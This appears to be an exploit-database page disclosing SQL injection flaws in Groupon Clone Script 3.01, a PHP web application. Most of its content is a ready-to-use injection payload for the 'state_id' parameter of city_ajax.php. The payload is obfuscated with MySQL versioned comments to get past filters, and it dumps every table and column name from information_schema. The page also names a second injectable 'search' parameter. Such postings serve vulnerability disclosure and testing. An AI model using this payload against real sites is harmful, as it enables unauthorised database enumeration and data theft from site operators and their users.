Home / exploitsPDF  

Groupon Clone Script 3.01 SQL Injection

Posted on 12 December 2017

# # # # # # Exploit Title: Groupon Clone Script 3.01 - 'state_id' 's' SQL Injection # Dork: N/A # Date: 10.12.2017 # Vendor Homepage: https://www.phpscriptsmall.com/ # Software Link: https://www.phpscriptsmall.com/product/groupon-clone-script/ # Version: 3.01 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/city_ajax.php?state_id=[SQL] # # -1'++/*!09999UNION*/+/*!09999SELECT*/+0x31,(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2))--+- # # # 2) # http://localhost/[PATH]/category_list.php?search=[SQL] # # # # # #

 

TOP